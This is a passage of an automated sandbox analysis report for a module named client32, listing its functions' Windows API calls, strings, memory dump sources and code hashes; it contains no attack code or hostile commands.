                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • LoadLibraryA.KERNEL32(gdi32.dll,?,7696CF90,?,11003CD2,00000000,00000008), ref: 11145585
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11145597
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11003CD2,00000000,00000008), ref: 111455AE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                                                                                                                • String ID: SetLayout$gdi32.dll
                                                                                                                                                                • API String ID: 796689547-836973393
                                                                                                                                                                • Opcode ID: dde69b7c526af55e07beda9024ccb717cfe0bebca0ca4c8431e2c36867a1e5e3
                                                                                                                                                                • Instruction ID: 180814c24cc9d0c6131e9c3ed620ec4cda32c211f2200629d3cd1894db3483c2
                                                                                                                                                                • Opcode Fuzzy Hash: dde69b7c526af55e07beda9024ccb717cfe0bebca0ca4c8431e2c36867a1e5e3
                                                                                                                                                                • Instruction Fuzzy Hash: 6CE0653A311124BBA70456769C489BFBB6EDBC99697154031FD28DBA00EB30D90246F1
                                                                                                                                                                Function 110BD710 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenu.USER32(00000000), ref: 110BD735
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000002), ref: 110BD74D
                                                                                                                                                                • DrawMenuBar.USER32(00000000), ref: 110BD761
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD71F
                                                                                                                                                                • m_hWnd, xrefs: 110BD724
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 381722633-2830328467
                                                                                                                                                                • Opcode ID: 2c46f38612fb75367a1df9c5075bbf601e14854f27eee6f1d6486de749529d1a
                                                                                                                                                                • Instruction ID: 5bee606e9d84f23a63a2df4afa114ff91c2ff399d672ba80e4cf04cebf447206
                                                                                                                                                                • Opcode Fuzzy Hash: 2c46f38612fb75367a1df9c5075bbf601e14854f27eee6f1d6486de749529d1a
                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0A739B50314ABC725DA749C98F9EF3A8BB8471CF04082DF12292580DB74B4458759
                                                                                                                                                                Function 110450BD Relevance: 7.9, APIs: 5, Instructions: 401COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeString$__wcsicoll_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3719176846-0
                                                                                                                                                                • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                                                                                                • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                                                                                                • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                                                                                                • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                                                                                                Function 11045160 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeString$__wcsicoll_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3719176846-0
                                                                                                                                                                • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                                                                                                • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                                                                                                • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                                                                                                • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                                                                                                Function 11165928 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4048096073-0
                                                                                                                                                                • Opcode ID: 74278988d92a0981e88ab1d304f7346d2170d04ffe63c1026edbb1760bdfed18
                                                                                                                                                                • Instruction ID: afac08f90629e30a7cffcb3f7cc11dd9a67156a1a1d83c27ab3f33a937463f4c
                                                                                                                                                                • Opcode Fuzzy Hash: 74278988d92a0981e88ab1d304f7346d2170d04ffe63c1026edbb1760bdfed18
                                                                                                                                                                • Instruction Fuzzy Hash: 1951D731E00306DFDB508FA5C98069EFBB9AF413A4F158269E86597290F7F29970CF51
                                                                                                                                                                Function 11065720 Relevance: 7.6, APIs: 5, Instructions: 125sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EndPagePrinter.WINSPOOL.DRV(?), ref: 110657F2
                                                                                                                                                                • EndDocPrinter.WINSPOOL.DRV(?), ref: 110657F8
                                                                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,?), ref: 110657FE
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11065806
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1106583A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Printer.$Close$HandlePageSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2391129857-0
                                                                                                                                                                • Opcode ID: b1bb8c1d5ba9991a9cd61f9f5830dcfcfd6faf83c7c2a0de74e0bd8fc72b6850
                                                                                                                                                                • Instruction ID: 2188d8da6c3b50539d481e9d7151b6b6488d697895cb624f8313360327e1a8df
                                                                                                                                                                • Opcode Fuzzy Hash: b1bb8c1d5ba9991a9cd61f9f5830dcfcfd6faf83c7c2a0de74e0bd8fc72b6850
                                                                                                                                                                • Instruction Fuzzy Hash: 0D416D75E00705EFEB00DF64DC80B9EBBE9BF48399F1181A9D919AB281D775A940CF50
                                                                                                                                                                Function 110B3910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000012,?,00000001,?), ref: 110B3A13
                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 110B3A83
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                • String ID: $8$xoffset=%d, yoffset=%d
                                                                                                                                                                • API String ID: 3168844106-373005067
                                                                                                                                                                • Opcode ID: cf0f5f12bababd7c73818f773dfd45466a6321e6dd973d90dccd5780fa010a61
                                                                                                                                                                • Instruction ID: 13f5dbf056a5fff6eb7eb2ddb131ca7f79cbfefb462763ec63b32f60666cabc3
                                                                                                                                                                • Opcode Fuzzy Hash: cf0f5f12bababd7c73818f773dfd45466a6321e6dd973d90dccd5780fa010a61
                                                                                                                                                                • Instruction Fuzzy Hash: 0151F3B5E082499FDB50CFA8D480B9EBBF4FF88304F20856EE819A7240E7756901CF55
                                                                                                                                                                Function 1103D410 Relevance: 7.6, APIs: 5, Instructions: 109threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,110B7560,00000001,00000000,?,00000000,?,00000015,00000000), ref: 1103D4B2
                                                                                                                                                                  • Part of subcall function 110B42E0: InitializeCriticalSection.KERNEL32(0000002C,?,?,?,00000000,?,?,?,00000000,11184D46,000000FF), ref: 110B4365
                                                                                                                                                                  • Part of subcall function 110B42E0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,11184D46,000000FF), ref: 110B436F
                                                                                                                                                                  • Part of subcall function 110B42E0: GetVersion.KERNEL32(?,?,?,00000000,?,?,?,00000000,11184D46,000000FF), ref: 110B438A
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 1103D51E
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00002000,11126510,?,00000000,?), ref: 1103D53A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000015,00000000), ref: 1103D541
                                                                                                                                                                • SetEvent.KERNEL32(?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 1103D581
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateEvent$CloseHandle$CritiusernitializeSectionThreadVersion_malloc_memsetwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1003535115-0
                                                                                                                                                                • Opcode ID: 9154998f9bead89350cc591ba6d82ba6fbed2b1eec8a96acc9dda808deea2a2c
                                                                                                                                                                • Instruction ID: 68e594b7f0b416b65d77d8c09baeebda6847d46efb3c775408e77be4df961281
                                                                                                                                                                • Opcode Fuzzy Hash: 9154998f9bead89350cc591ba6d82ba6fbed2b1eec8a96acc9dda808deea2a2c
                                                                                                                                                                • Instruction Fuzzy Hash: DC418C74D04719AFEB10DFB4C888BAEB7F4FB44719F404529E92A962C0DB75B444CB51
                                                                                                                                                                Function 110CF580 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110CEBA0: EnterCriticalSection.KERNEL32(00000000,00000000,59FD48C0,00000000,00000000,00000000,110CEEC0,?,00000001), ref: 110CEBDA
                                                                                                                                                                  • Part of subcall function 110CEBA0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEC42
                                                                                                                                                                • IsWindow.USER32(?), ref: 110CF5DB
                                                                                                                                                                  • Part of subcall function 110CBE90: GetCurrentThreadId.KERNEL32 ref: 110CBE99
                                                                                                                                                                • RemovePropA.USER32(?), ref: 110CF608
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF61C
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF626
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF630
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1921910413-0
                                                                                                                                                                • Opcode ID: b2cb9210c48ec020780b730079c096d2d0f15fc37eb5c92fb884244d7da54c06
